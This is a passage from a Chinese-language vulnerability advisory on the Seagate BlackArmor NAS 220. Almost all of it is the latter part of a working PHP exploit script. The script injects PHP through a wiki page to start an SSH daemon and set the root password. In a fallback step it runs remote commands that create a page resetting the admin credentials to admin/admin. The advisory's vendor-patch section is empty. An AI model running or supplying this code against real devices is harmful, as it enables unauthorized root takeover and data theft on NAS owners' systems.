Seagate BlackArmor NAS 220 多个安全漏洞(2)

curl_setopt($ch, CURLOPT_POSTFIELDS, "sectok=" . $sectok .
"&id=playground:playground&do[save]=Save&wikitext=<php>exec(\"/usr/sbin/drop
bear start;\"); exec(\"echo '" . $root_password . "' | passwd
--stdin;\");</php>");

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_AUTOREFERER, 1);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);

curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");

curl_setopt($ch, CURLOPT_URL, $url . "/wiwiki/doku.php");

curl_exec($ch);

curl_close($ch);

echo "- The devices is rooted! The password is: " .
$root_password ."\n";

echo "- The SSH daemon was also enabled!!\n\n";

} else {

echo "- Can't root the device due to lack of admin
credentials\n";

echo "- However, do you want to reset the admin password? [yes]:";

$handle = fopen ("php://stdin","r");

$line = fgets($handle);

if(trim($line) == "yes") {

$httpResponseCode = RemoteFileExist($argv[1] .
"/backupmgt/immediate_log/instance.log");

if ($httpResponseCode == "200") {

RemoteCodeExec($argv[1], "sed '11,16d'
/proto/SxM_webui/d41d8cd98f00b204e9800998ecf8427e.php >
/proto/SxM_webui/reset.php");

RemoteCodeExec($argv[1], "chmod 755
/proto/SxM_webui/reset.php");

echo "- Now go to: " . $argv[1] . "/reset.php to
reset the default credentials to admin/admin.\n";

exit;

} else {

echo "Something went wrong, the HTTP error code is:
" . $httpResponseCode . "\n";

}

} else {

echo "Exit....\n";

exit;

}

}

} else {

echo "- No passwords were found!\n";

echo "- However, do you want to reset the admin password? [yes]:";

$handle = fopen ("php://stdin","r");

$line = fgets($handle);

if(trim($line) == "yes") {

$httpResponseCode = RemoteFileExist($argv[1] .
"/backupmgt/immediate_log/instance.log");

if ($httpResponseCode == "200") {

RemoteCodeExec($argv[1],
"sed '11,16d' /proto/SxM_webui/d41d8cd98f00b204e9800998ecf8427e.php >
/proto/SxM_webui/reset.php");

RemoteCodeExec($argv[1], "chmod 755
/proto/SxM_webui/reset.php");

echo "- Now go to: " .
$argv[1] . "/reset.php to reset the default credentials to admin/admin.\n";

exit;

} else {

echo "Something went wrong, the HTTP error
code is: " . $httpResponseCode . "\n";

}

} else {

echo "Exit....\n";

exit;

}

}

?>

建议：
--------------------------------------------------------------------------------
厂商补丁：